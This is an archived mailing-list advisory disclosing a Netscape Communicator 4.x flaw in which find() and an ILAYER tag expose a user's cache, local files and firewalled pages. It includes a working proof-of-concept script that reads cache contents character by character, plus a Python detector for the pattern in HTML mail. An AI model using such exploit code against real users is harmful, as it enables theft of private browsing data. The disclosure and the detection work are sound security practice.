There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I guess all 4.x versions are vulnerable) which allows the following security exploits:

*) Reading the parsed content of local HTML files (by 'parsed' I mean the text the user sees, not the actual HTML source)
*) Reading the parsed content of HTML files on a web server blocked by a firewall (the browser and the web server must be on the same side of the firewall)
*) Reading user's cache
*) Browsing directories
*) Probably others

The exploits use the JavaScript find() function and the ILAYER tag.
This may be exploited using an HTML message.

Workaround: Disable JavaScript

Demonstration is available at:
http://www.nat.bg/~joro/nsfind.html

-----------HTML code-------------
MBEGIN
<ILAYER SRC="wysiwyg://1/about:cache"> </ILAYER>
<SCRIPT>
//mag='MBEGIN';
mag='Average cache';   // known text that precedes the data of interest
mend='MEND';           // marker placed after the layer
res=mag;
charstoread=100;
function readit()
{
  for(i=0;i<charstoread;i++)
  {
    t=res;
    find(mend);        // reset the selection to the end marker
    for(c=1;c<256;c++)
    {
      // extend the known prefix by one candidate character and
      // let find() report whether that string occurs in the document
      t=res + String.fromCharCode(c);
      if (find(t,true,true))
      {
        // alert(c);
        res=t;
      }
    }
  }
  res=res.substring(mag.length);
  alert("The first URL in your cache is: \n" + res);
}
setTimeout('readit();',3000);
</SCRIPT>
MEND
---------------------------------

Regards,
Georgi Guninski
http://www.nat.bg/~joro
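Since the advisory notes that the flaw can be triggered through an HTML message, a mail gateway or content filter can at least flag the pattern it describes: a LAYER/ILAYER whose SRC points at a local or browser-internal URL, combined with inline script that calls find(). The following detector is an added example written for this page, not code from the original post or from Netscape; the sample messages it scans are constructed here, and the scheme list and severity labels are the example's own choices.

```python
import re
from html.parser import HTMLParser

# Schemes that, inside a LAYER/ILAYER SRC, point the layer at content the
# sending site should not be able to read (assumption: list chosen for this
# example from the cases named in the advisory: cache, local files).
LOCAL_SCHEMES = ("wysiwyg:", "about:", "file:")

# Matches a call to find( ... ) in script text, e.g. find(t,true,true).
FIND_CALL = re.compile(r"\bfind\s*\(")


class LayerCollector(HTMLParser):
    """Collect LAYER/ILAYER SRC attributes and the text of inline scripts."""

    def __init__(self):
        super().__init__()
        self.layer_srcs = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag in ("layer", "ilayer"):
            for name, value in attrs:
                if name == "src" and value:
                    self.layer_srcs.append(value.strip())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def analyze_html(html):
    """Return a dict describing whether the ILAYER + find() pattern is present.

    severity is "high" when a layer loads a local/internal URL and a script
    calls find(), "medium" when any layer SRC is combined with find(), and
    "none" otherwise (find() on the page's own text is legitimate).
    """
    parser = LayerCollector()
    parser.feed(html)
    parser.close()

    local_layers = [
        src for src in parser.layer_srcs
        if src.lower().startswith(LOCAL_SCHEMES)
    ]
    uses_find = bool(FIND_CALL.search("\n".join(parser.scripts)))

    if uses_find and local_layers:
        severity = "high"
    elif uses_find and parser.layer_srcs:
        severity = "medium"
    else:
        severity = "none"

    return {
        "layer_srcs": parser.layer_srcs,
        "local_layers": local_layers,
        "uses_find": uses_find,
        "severity": severity,
    }


# Constructed sample messages (not taken from any real mail).
SAMPLE_CACHE_READER = """
<ILAYER SRC="wysiwyg://1/about:cache"></ILAYER>
<SCRIPT>
res='Average cache';
for(c=1;c<256;c++){ if (find(res+String.fromCharCode(c),true,true)) res+=String.fromCharCode(c); }
</SCRIPT>
"""

SAMPLE_INTRANET_LAYER = """
<ilayer src="http://intranet.example.invalid/"></ilayer>
<script>window.find('x', true, true);</script>
"""

SAMPLE_BENIGN = """
<p>Quarterly report attached.</p>
<script>document.title = 'Report'; find('Quarterly');</script>
"""

if __name__ == "__main__":
    for label, msg in (("cache reader", SAMPLE_CACHE_READER),
                       ("intranet layer", SAMPLE_INTRANET_LAYER),
                       ("benign", SAMPLE_BENIGN)):
        print(label, analyze_html(msg)["severity"])
```

The "medium" tier exists because the advisory's firewall case uses an ordinary http:// URL that a static filter cannot classify as internal; a deployment that knows its own address ranges can promote those to "high".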
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:15 PDT